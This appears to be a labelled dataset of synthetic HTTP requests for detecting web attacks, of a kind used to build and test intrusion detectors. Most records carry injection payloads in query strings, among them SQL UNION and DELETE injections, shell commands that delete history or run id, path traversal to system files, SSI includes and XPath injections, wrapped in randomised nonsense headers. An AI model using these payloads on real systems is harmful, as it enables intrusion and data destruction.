User-Agent: Mozilla/3.7 (X11; U; Unix 0.5; as-eh; rv:1.2.5) Gecko/21967804
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/4.5 www.hoilnfta.jpeg, son/7.5 www.ee4twimK.js, HTTP/4.0 www.kcyeNoeD.htm
Transfer-Encoding: dseWa; err7=sIiEEEF
Upgrade: Su9qj/8.6, baec/7.2
Warning: 283 165.131.195.235 "tsglezenghAmr73slp" "Sat, 19 Sep 09 07:14:05 CET"
X-Forwarded-For: 136.2.161.83
X-Serial-Number: 576547919315
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46283
Start - Id: 42211
class: SqlInjection
GET /gdAftyeNi7n/2db1aoiezmlhusDlo/oXjn8ccefao2uIo/pbthrtii8xhente/iUPUN3M7tMdr7/sW_phWua.jsp?c1yeoh=95XLpytwM&ei=7649951&d4hhaif3he=%27+++++UNION+++++++++++++ALL++++++++++++SELECT+irenseg+FROM+++++btmOn+WHERE+%27%27++++%3D+++%27&di=tux%40E&onl2menqtyrn=90187149&IJRbody=%7C&nfromboot.iniA0MwinntG=a3Lbz_&1Dbz7=wZF&8Eqtoiak=o2CcP&1huwehstsB=gdsaegi HTTP/1.0
Host: 206.4.15.99
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad, x-mac-cyrillic;q=0.9, windows-1250;q=0.5, iso-10646-ucs-2
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 110.245.212.227
Cookie: aBnt=c7G;reeougA=283;5l@QgB2dKh=2;ZCA0=$rD;s3kijEtlincdsl9=3772190773
Cookie2: $Version="62"
Date: Wed, 13 Apr 05 17:18:49 GMT
ETag: "08QcJQ-@nCVHGD-jk@-M"
Expect: Loobi=oDnd
From: bp6teizi@aeuaCwa.uk
If-Modified-Since: Thu, 21 Jul 05 02:24:56 GMT
If-Unmodified-Since: Wed, 24 Aug 05 23:43:17 UTC
If-Match: "9.455jTE6DTQmB@iNr"
If-None-Match: *
If-Range: Sat, 19 Feb 05 21:31:27 UTC
Max-Forwards: 0874
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: Basic cllldDpNc2FsdGRvbg==
Range: 8473-303,-227666,770360-
Referer: http://aaTt.ch/dios.asp
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.4 (X11; U; Linux i386 3.2; su-ej; rv:5.5.9) Gecko/67947450
UA-CPU: 68000
UA-Disp: 327,4301,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 2.8 9.251.32.190, HTTP/3.1 www.iekur.css, FTP/5.5 www.3hrm.htm:93798
Transfer-Encoding: gzip
Upgrade: he8e/9.1, uArqem/3.7, oettlh/8.9
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 32378960313
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42211
Start - Id: 43397
class: OsCommanding
GET /ie8enhhNyefaaeec/ige/zoQIgqGperl8DhkdocumentLY/e5blaeaiehioent1il/uXXkK5Y.Hb/cueicowr/s6nhdpnsiE6ai3u9a8oF/qa/ee/e00tj.Wujc6ny@wj/ddyjKtfLfr/sstefo.tiff?tmwt=%27++%3Brm+%7E%2F.bash_history+++%3B HTTP/1.0
Host: www.fielreeaer.biz
Connection: oe9dse
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 143.76.65.70
Cookie: Blt=san:eeeif:oeoo;eentzaepc2=etifh
Cookie2: $Version="5"
Date: Thu, 13 Apr 06 14:59:21 CET
ETag: W/"AMQ50BgW5OZswZc"
Expect: r7zlrt=b3tw9ls;aeiop=hnEr
From: su7olsim@shSdnne.cz
If-Modified-Since: Tue, 26 Sep 06 05:59:55 GMT
If-Unmodified-Since: Sun, 15 Nov 09 08:33:03 UTC
If-Match: "d30xvdIrjFZxaS-v2WxE"
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 6.9
Pragma: dzsGn4in=Weti
Proxy-Authorization: Basic dXNTYmEwOmVlc2g2
Authorization: Digest nonce
Range: -4315,8885-439,063-
Referer: http://i9eYdo.it/mkrqc9ia/ne3tgos/Lnuq/np3i4/8yash1.pdf
TE: trailers,gzip;q=0.3
Trailer: If-Range
User-Agent: YIeQ0jna
UA-CPU: StrongARM
UA-Disp: 3207,5717,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: FTP/5.0 84.218.27.189
Transfer-Encoding: deflate
Upgrade: 37mj/0.5, lgeOa/4.4, ot2tcN/1.9, rat/6.0, EpB/9.2
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43397
Start - Id: 43100
class: OsCommanding
GET /Trcpwhere8LY1uYigytw./aN3rawtnult/pinuB3O5/cZKNEIys/c-cud2gFoX/sock_streamaobjectJF3Mandj6RWx/nxuPAhQJdT3EZ/aA.cfm?rdbbivcT5hta=180520051&A0VJypasswd_DoDB=ea&ebvhI=717&hotbaoartan=erde&hiu=2bstukamrrikndd&meHB=%5C%3B++++%5C%2Fbin%5C%2Fid++%3B&fri9erlna=9&hoieozdshfte=1253276&uaziiWUbs=A2d&tb5gcsFtl2idt2a=ewarGrcd5c5nnon&nd1niLe=golukpttwrs&eujnsdrHdzhee=tC-rE HTTP/1.1
Host: www.HitmjnSS.it:35
Connection: close
Accept: video/*;q=0.8, text/*;q=0.6, text/plain
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.1, gzip, deflate
Accept-Language: *;q=0.4
Cache-Control: min-fresh=32
Client-ip: 160.22.241.142
Cookie: oey3efl9rrsN=201
Cookie2: $Version="127"
Date: Fri, 15 Aug 08 12:40:42 GMT
ETag: "-lAGuXywvzkdCvKFXf_j"
From: qEgfHnmn@tsw5sAas.biz
If-Modified-Since: Tue, 03 Feb 04 16:41:24 GMT
If-Unmodified-Since: Tue, 03 Feb 04 18:28:18 GMT
If-Match: "03M9dD5y5JmloZcTZw"
If-None-Match: *
If-Range: "HL4rjtEB9D0isHuw"
Max-Forwards: 8
MIME-Version: 1.3
Pragma: utogitrL=s
Proxy-Authorization: NTLM OXpyZ29vZW1ubnlmbzhlZXV1Y2tyaHN0ZGF4ODFuYmFhZHRr
Authorization: Basic ZWx3dG86cHVsc3U=
Referer: http://www.exd6aL.uk/cdAmeTei/qmsotesb/rurcnw6.mdb
TE: deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/2.7 (Windows; U; Windows NT 7.3; wa-do; rv:3.4.8) Gecko/37736523
UA-Disp: 418,932,32
UA-OS: Solaris
UA-Pixels: 2923x7442
Via: HTTP/0.0 96.113.93.34, HTTP/5.5 153.179.163.247, 8.0 www.aeosyOt.htm
Transfer-Encoding: deflate
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Serial-Number: 306986025864028
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43100
Start - Id: 45216
class: PathTransversal
GET /./? HTTP/1.1
Host: 38.137.161.62
Connection: close
Accept: text/*;q=0.1, text/*, video/quicktime
Accept-Charset: ks_c_5601-1987;q=0.8, iso-8859-5
Accept-Encoding: compress;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 115.213.88.73
Cookie: m4ZJ=08156;sutgAsgrb10a=isdUegs;sskiaih=46;seh1=ba%Saeitp9OeZR;9uiyleeroFa=octehea0dactaow;svltwna=17747
Cookie2: $Version="38"
Date: Sun, 05 Jul 09 11:07:20 GMT
ETag: "Fye-r9dja0fSKIbx"
Expect: okyem
From: 1p4rry@estl2a.org
If-Modified-Since: Tue, 21 Feb 06 05:39:31 UTC
If-Unmodified-Since: Sat, 29 Nov 08 14:37:13 UTC
If-Match: "l.vX.hJEasDfI8kBDA"
If-None-Match: "3feiAFLqyLA4s@5W6klb"
If-Range: Fri, 07 Sep 07 22:02:20 CET
Max-Forwards: 1438
MIME-Version: 3.6
Pragma: dicabtb='acqng8'
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM MXBhbmt5bmFPbm9RaWFyZ2VlYm9uanVndHRhZWlhc2VhYQ==
Range: -01750,762-,10389-0
Referer: http://www.rteee.com/uAtdI/eonnetl.asmx
TE: trailers
Trailer: Expect
User-Agent: Mozilla/2.6 (Windows; U; Win98 2.2; xe-UY; rv:1.7.2) Gecko/31341943
UA-CPU: 68000
UA-Disp: 675,5988,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2272x045
Via: 7.2 1.187.9.147:3794, FTP/4.1 www.eRtze.js
Transfer-Encoding: to2uw
Upgrade: botOA/6.4, hiei4a/3.6, u8Qat/8.0
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 254.23.68.104
X-Serial-Number: 706890452941318
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45216
Start - Id: 41845
class: SqlInjection
GET /u8iu1uctmNtnrttzt/lsGyTop/cb2/nana/aHB3U/a7.K_Q-gyN/dIiu7ntet1phrcamnE/nb81k177Vkh/processing-instructioniPn@Uxe1tKEH/ByOTC7_RV0ac/VhttpfromF/tOhhycwBWnv.mspx?dddan=60&isjlyhetjsyxe1s=Yo%27%2F**%2FUNION%2F**%2FSELECT%2F**%2F5ri%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2Fyhgotz%2F**%2Flike%2F**%2F%27%2525&iwentxelyi=oetgCelAyea8hlrga&efU6qtaa=lzp&ls93mtron=3hnesnHohheiahepts&tdirRanjauuam=enp+%29%7Ed&alks=76te&7ohn6=%29a&scriptb3D=lT&lfjrtt=yqZqL_B21&adyr=%2Bmllru&Leet=%26de&5fhudsjnh=61&oIbbnoaaa=dwp-nddns%3AHI7shutdown HTTP/1.1
Host: www.tuefanpece.de:6
Connection: neeoy
Accept: application/*;q=0.2, application/postscript
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: OmaioBj-erobqAfo;q=0.3, e-er2aiyf;q=0.3, e-9;q=0.3, ega8g-a
Cache-Control: no-transform
Client-ip: 78.57.136.131
Cookie: e32TluAeanOesa2=adminalcb;65bnot10ieusm6a=1;5iart=68182;.wK2txUuZQ=0tdt
Cookie2: $Version="1"
Date: Mon, 19 Apr 10 10:27:55 CET
ETag: W/"cz.00rc4Qme_.Upsmc"
Expect: eeofsc=natlqi
From: dupNd@t1Lces4e.com
If-Modified-Since: Sun, 17 Sep 06 13:50:27 GMT
If-Unmodified-Since: Thu, 03 May 07 24:46:57 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic dG90ZGgzMTpUb2hj
Authorization: heea seltmfr=o7On
Range: 73381-69805,4-176585
Referer: http://www.Tobissa.cz/eootwoo.asp
TE: trailers,gzip,gzip
Trailer: Max-Forwards
User-Agent: cS1jcd96 http://www.uuserr.com
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/7.0 www.sdiMcdb.jpg:7, 3.0 246.96.49.78
Transfer-Encoding: identity
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 541 75.79.93.246 "gtmeetecTcrcgl" "Sun, 13 Nov 05 09:19:41 UTC"
X-Forwarded-For: 187.70.226.8
X-Serial-Number: 431124702375
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41845
Start - Id: 49951
class: XPathInjection
GET /f0/rssdensbfvmrr6t/i4hhan9/ojooo/SHWNhttpPP9uty/84xn.lApasswddQCZ.jpeg?brotvhtmogTSy=68aee%27+++or+++1%3C++eaciml%2Flp%2Fa5elbe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D56%5D++or++++%27tao%27+%3D++%27&i1eooe15vae=su0NWlFKK0&eoauTn2s=9 HTTP/1.1
Host: 152.52.138.246:305
Connection: close
Accept: text/html, application/zip
Accept-Charset: cp-936;q=0.2
Accept-Encoding: compress, compress
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 6.57.199.123
Cookie: betweenQfjtmpsn=1156
Cookie2: $Version="9"
Date: Sun, 20 Apr 08 21:45:38 GMT
ETag: W/"Iy_DNmlUhoJDmsXeKRd"
Expect: 100-continue
From: thnep@gnfilnelrR.biz
If-Modified-Since: Thu, 04 Mar 04 20:16:15 GMT
If-Unmodified-Since: Mon, 07 Mar 05 10:51:09 CET
If-Match: *
If-None-Match: "zNX.NeWuwJFY-Fw."
If-Range: Thu, 13 Mar 08 19:10:42 GMT
Max-Forwards: 79
MIME-Version: 0.7
Pragma: Rw=meqtbnet
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: evwOlt lsy3mt=9sciu
Range: 33-0
Referer: http://msSp.cz/aOsnth/KhTeemmv/uearxo.sh
TE: trailers,deflate;q=0.2,gzip;q=0.8
Trailer: If-Range
User-Agent: Mozilla/6.4 (X11; U; Open BSD i586 0.1; zS-en; rv:7.3.3) Gecko/75072942
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 299x2707
Via: FTP/9.3 www.9goxeoae.tiff
Transfer-Encoding: wtev
Upgrade: d4T/6.8, oecM/8.1, tgey/1.2, v4dyl/2.5
Warning: 150 www.dveacIt.jpeg "Sy2gleewctth" "Sat, 02 Jan 10 06:19:03 GMT"
X-Forwarded-For: 43.162.129.161
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49951
Start - Id: 48749
class: XPathInjection
GET /sNltnemndmafompscpA/qZl9_C4tpa-wD@.shtml?7nkzttpa0at=anVe&zf4tEtepanly1zu=iyseic3ybhs&nrr=284&ksoi9r7iTwlo=eM4%2Fcsnh%2Fenlnm%2Fchild%3A%3Anode%28%29%5B+position%28%29%3D4%5D++%7C+++++w8et%2Fe%2Fh%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D20%5D+or++++%27ff%27++%3D%27&vet=ie9 HTTP/1.0
Host: 89.151.246.25:80
Connection: keep-alive
Accept: text/*
Accept-Charset: windows-874, gb2312
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-age=994
Client-ip: 52.241.218.21
Cookie: rlctoaO=ies7ir7ue;mgoatttttmx7wde=xdi;3pont8sao4s=tasdvbscriptpwP;htpassH7g1RRshutdownd=la
Cookie2: $Version="094"
Date: Fri, 14 Apr 06 07:41:12 UTC
ETag: W/"996BwVNCkYJYl76n"
Expect: 100-continue
From: 2thchRa@mEq7atat.cz
If-Modified-Since: Tue, 06 Jan 04 06:57:16 GMT
If-Unmodified-Since: Thu, 13 Mar 08 16:16:55 GMT
If-Match: "It.CqEGnl7p1Jc_"
If-None-Match: "Gmd.ydn1nlXgHbVs"
If-Range: Thu, 14 Oct 04 09:30:35 CET
Max-Forwards: 0
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic TWlpaTozZXdF
Authorization: NTLM dG1sZW1lZUFwdTlpaWlFcnJkYWV6d256ZWVuandpaHNMZW9nbG9lZWhjZG5ybg==
Range: -506333,18704-151605
Referer: /eyshO7ld/rdii/dooepm2l/ojeis9/e7rrg.bin
TE: gzip,gzip;q=0.7,chunked
Trailer: Via
User-Agent: Mozilla/2.3 (compatible; cLdzto; Linux i586; rslTEytu; fayo5re)
UA-CPU: MIPS
UA-Disp: 132,229,32
UA-OS: WinNT
UA-Pixels: 9907x836
Via: HTTP/4.4 www.feeoenhe.shtml, FTP/0.0 www.e6fED.jpg, 5.7 88.118.176.231
Transfer-Encoding: deflate
Upgrade: asd/1.5, Ttn35k/8.5
Warning: 303 90.249.48.25 "nehmlsj3aoo" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48749
Start - Id: 40560
class: SSI
GET /isstuihep2oslc9ic3wt/8TIjn1-W5/esbA/esnot/ibqffwDnLX1/iXEdYiRikL6WrkXM3v.cfm?V-Tmuc=l%24ka&Ko0HLIBxdvJH=iw+positionesalls&e2ruc3zetedR3ho=yusiebsil3n7n&gAliiuohT=uTnoyn&vgyfSTe46cedU0=514441646&eeroeo1h=60&bhsq=%3F%29laN%3Batq&goanaoveme=4usa+s4no+nE%3E+tu78i&OconnectUwH=ist1%7EtHo%7Cjn&yn9n=ovWhtsock_stream&t5sr=stuarsrIu%25o&xduwnriT3uRgp=%3C%21--++++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&st=Jrce&tts2hmrahsjdf=mlulbrredmwhaeg HTTP/1.0
Host: 189.94.86.134
Connection: 0udhjej
Accept: */*;q=0.0
Accept-Charset: x-mac-greek;q=0.8, iso-2022-kr, koi8;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 99.30.78.189
Cookie: d4hairagrsraja=1 T[o;DZ374oCIh6q=4667471296;iipghez=9818302;nufr8otHkeemy=<msI;ECR0H@W=i.P@aXp56y
Cookie2: $Version="29"
Date: Mon, 26 Nov 07 01:29:12 GMT
ETag: "HuFxYsgHzg7.vMq"
Expect: 100-continue
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Tue, 25 Mar 08 16:27:17 GMT
If-Unmodified-Since: Sun, 25 Apr 10 10:44:07 UTC
If-Match: *
If-None-Match: "YpqIZcDHee6yEJVAw56L"
If-Range: Sat, 30 May 09 10:53:02 CET
Max-Forwards: 09
Pragma: rannp='ruaaemwe'
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest realm
Range: 488078-9765
Referer: /txle/egnrg/otleei/reeic5at/sdtvtior.tar.gz
TE: chunked,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/4.8 (Machintosh; U; Mac OS X 3.1; Et-re; rv:3.7.1) Gecko/55796929
UA-CPU: PowerPC
UA-Disp: 9897,2290,16
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: 7.1 2.144.27.25:34
Transfer-Encoding: compress
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 885 www.ctsaoon.js "2nm3fnnnfehteoPv" "Sun, 30 Sep 07 18:31:53 UTC"
X-Forwarded-For: 93.136.204.39
~~~~~: ~~~~~~~~~~~

null

End - Id: 40560
Start - Id: 46156
class: PathTransversal
GET /5nvOoHttieygs1.png?c00oglurhCon=yti&dila=nkSacqE&Gkuteeeestmti=%255de&olaanerehwl3rp=2135546935&9leOb=Ri%5C%27i%5CgcopyFbaerRx&so=453&nQmkjuZ8d=Shni&iy6tin=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&netcatNd_m0qs76kO=9SxbtetoBeat&edYcyory=liiuehftteRpFiK HTTP/1.1
Host: 176.243.167.108
Connection: ei3rvEr
Accept: application/x-tar, audio/*, audio/x-wav;q=0.9
Accept-Charset: x-mac-japanese, euc-cn
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=349
Client-ip: 172.17.95.67
Cookie: ihi=24;tr8rorinqsta= aeeee$|Ka;tpol=576034;o9s=i ;eeia9Jlst=25583186
Cookie2: $Version="64"
Date: Fri, 25 Jun 04 19:19:27 GMT
ETag: "VfPdiXxvEuyVogNVe_"
Expect: 100-continue
From: ehreer@1nwhcp.uk
If-Modified-Since: Sun, 01 Jan 06 07:45:29 UTC
If-Unmodified-Since: Tue, 12 Oct 04 18:55:33 CET
If-Match: *
If-None-Match: "q.fudkexvxQPIuaziy7B"
If-Range: *
Max-Forwards: 88
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic M0FydHB3bDpscGpzanRlYQ==
Authorization: Digest opaque="entieri"
Range: 542-,61-,33-
Referer: /or4cur/usfhlewt/eubetfen/leequet.pl
TE: trailers,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.3 (X11; U; Solaris 1.8; eh-gt; rv:8.0.4) Gecko/88189459
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 390x0476
Via: FTP/5.3 68.61.255.222, 9.5 147.168.55.62, 2.5 94.189.130.42
Transfer-Encoding: compress
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 90.173.143.30
X-Serial-Number: 678023085
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46156
Start - Id: 42409
class: SqlInjection
GET /6n6ayseirr6si/0tLiaoxmshe/toh0Sc/sbsIlsatrrdethj/XVhR7RWPaccept.shtml?2irdncnzgMQ1ee=%27++++%2B+++++%28++++SELECT+++TOP++++1+++yvfr+++FROM+++wdpb%29++++%2B+%27&hkoslap=5592 HTTP/1.0
Host: www.chL9e.gov:93
Connection: ht0xt
Accept: */*;q=0.3
Accept-Charset: iso-8859-7;q=0.7, x-mac-roman;q=0.6, windows-874;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 3.13.156.66
Cookie: erong47mhdareol=rhttMvtg5rPdwvltbd;e1AorkPuisa=895581;sonrnlodHse=iklmail7ifromt;-Ny5GdZsm=ioi7Ost;88=sTvoer
Cookie2: $Version="0"
Date: Sat, 18 Jul 09 18:29:47 CET
ETag: "3Txo73O3VxszwEa72Y_"
Expect: n9b6et=eeaexsg
From: 1tXiees@Csgv.st
If-Modified-Since: Thu, 17 Jul 08 19:06:18 GMT
If-Unmodified-Since: Wed, 27 Oct 04 19:47:38 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic YWV0ZWJwdzplbHdOZm1lcg==
Authorization: Basic ZXNkdTphYjBlYWs=
Range: -4,92807-997,-01613
Referer: /eoandanV/l0wye.cfm
TE: chunked;q=0.7
Trailer: Host
User-Agent: Mozilla/5.2 (X11; U; Solaris 6.2; ja-te; rv:5.8.6) Gecko/95342459
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 189x646
Via: 3.9 www.oege.gif, 8.2 www.llttnaal.gif:90253
Transfer-Encoding: gzip
Upgrade: 2ac/9.1, rwme/4.7
Warning: 321 133.114.70.22 "eluta" "Thu, 01 Dec 05 01:44:32 CET"
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 67876
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42409
Start - Id: 42224
class: SqlInjection
GET /EiEmku/Elod83hqz1K.jpg?gbsptmfh=30161&e3e2v=30054&ldgbaasnear=0491&ehlSdOeo3jm0ye=68&eo=eor+b0&tdiocueHods=rJtodoem%27%29%3BDELETEFROMusersWHEREupper%28username%29++++%3D+++upper%28+++%27admin HTTP/1.0
Host: 80.70.51.197
Connection: anmse
Accept: image/jpeg;q=0.2, application/*, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, gzip;q=0.2, gzip, gzip, compress;q=0.6
Accept-Language: Eej-59EqcTf, scr6a66r-l;q=0.9, e-o9ni, zi9-r4g, l-t;q=0.0
Cache-Control: only-if-cached
Client-ip: 113.18.47.101
Cookie: WoCS=e) lwu-0iprw
Cookie2: $Version="35"
Date: Thu, 26 May 05 17:31:18 UTC
ETag: W/"tXiGyLYJXuOw39ER0"
Expect: 100-continue
From: 6bttom@2kOpyg.org
If-Modified-Since: Sun, 27 Mar 05 18:19:05 GMT
If-Unmodified-Since: Sat, 08 Aug 09 22:29:58 UTC
If-Match: "NCKukWukmNVxIKFT5p"
If-None-Match: "ok5DSQf1opGcR0D"
If-Range: "nQD8RjO5nsCm4fa88OPP"
Max-Forwards: 6996
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic eXJoZTc6dEVpZXQ=
Authorization: Basic UnRvZG9ubzplbGVvMTV4
Range: 498-82346
Referer: /utlaen/sAtrda.cgi
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.6 (X11; U; Open BSD i586 1.4; tb-ms; rv:4.7.1) Gecko/58366926
UA-CPU: x86
UA-Disp: 6743,482,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 7.1 1.92.15.219, 7dajzt/4.7 25.45.198.230
Transfer-Encoding: deflate
Upgrade: s1sE/7.8, ytaat/3.7, hNej/0.0
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42224
Start - Id: 48501
class: XPathInjection
PUT /ilspRbmsuoThspisha/2xf_0dTmVgLtnph-/srAQK.p1apZ9SnGya/o6oFbxr5HS/2Rwll0/sBOErgEt.khfkzhzZ3pY/SssqhPe.exe? HTTP/1.1
Content-Length: 453
Content-Language: hoiNin,iPI,y0mnrh3o
Content-Encoding: compress
Content-Location: /feoo/kn5toi/sldReaIi.msf
Content-MD5: dW9SaW1VUmllb3JsbWxvYw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Oct 07 18:12:09 GMT
Last-Modified: Sun, 23 Apr 06 02:18:15 CET
Host: 47.143.182.92
Connection: close
Accept: image/*, text/xml
Accept-Charset: koi8-r;q=0.9, x-mac-ce, cp-936
Accept-Encoding: 
Accept-Language: eefRa-awdciti, Sa-cI;q=0.2, f69Ew-hetI;q=0.1
Cache-Control: min-fresh=5
Client-ip: 186.162.234.129
Cookie: uytsnaeasiulot=nane9ripm0o
Cookie2: $Version="932"
Date: Fri, 27 Apr 07 05:29:30 CET
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: vnemc
From: numhoTo@rsni1ore.com
If-Modified-Since: Thu, 27 Jan 05 18:47:46 CET
If-Unmodified-Since: Mon, 02 Jul 07 23:15:02 UTC
If-Match: "HEIPNYUXvoM-pIeztMy"
If-None-Match: *
If-Range: Fri, 26 Aug 05 07:49:20 UTC
Max-Forwards: 9249
MIME-Version: 1.8
Pragma: 9p=eDos
Authorization: NTLM ZW5hZmVlbm9yYU9mbXNuZ256M1llZTRvSml6dG9GcjZpcHh0c2VDb3l0bg==
Referer: /tsft/wo5kaona.wmn
TE: trailers
Trailer: Pragma
User-Agent: 2oW2ruhl
Via: eae/2.8 www.0p9a.htm, HTTP/5.6 37.124.9.63
Transfer-Encoding: 5atK
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 01871
----: -------------

CG_OFn=lsfhRO_y-&rnthshhu=cUnowDSen06pic&w7rrletsat=wierknepv50Wa&3winntallw2u-d=ngtitmui&gnnyhOleizoee=5&8nrepg=azas5khEh&AyaqB9FP8=jgrcaiacnFn&l4eehceuiLl8li=?openf&nhet=2     or     count(path/child::node()[position()=((i+j+k+l+1)]   |   path/child::*()[position()=(k+1)])=1    or    1142=&8-q0X=h2n&PpqFS=83&hnodEsra0=tstogdz&ertiniV=0dm;w&Nni=079&Eonsdlpoe=tfFfesinclude'y

End - Id: 48501
Start - Id: 37575
class: LdapInjection
PUT /h1S9ZnF7nFpc_/script.HC1Yhome-ca9Q/5heteaernTzuptsalrts/e3ieidaehsbx/oFWGdx1sr1DXskcjyt./yebo/rtewrneRz9ectueomo/crsaiageotoeRC2onses/oz6DfEP693.exe? HTTP/1.0
Content-Length: 86
Content-Language: wa,0ao,aeeiU
Content-Encoding: deflate
Content-Location: http://www.45aZ.uk/briix/rrdhog.jsp
Content-MD5: c2k4cHJtYWVlclR0ZTVzbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Apr 04 21:56:55 GMT
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: 46.207.72.242
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-3, iso-8859-7, iso-8859-7;q=0.5, shift_jis;q=0.0, ks_c_5601-1987
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 234.104.82.80
Cookie: eeeouRzLjoRsisx=oa$qtp$;8sanestes=EotaacepDt;tatopdyei=e]ohtpassh p0ltpe+eie&xi
Cookie2: $Version="03"
Date: Wed, 15 Nov 06 15:41:48 UTC
ETag: W/"A92uOn1wRLAjIgH"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Fri, 30 May 08 10:14:04 UTC
If-Unmodified-Since: Mon, 06 Mar 06 23:22:28 GMT
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: *
Max-Forwards: 98
MIME-Version: 0.1
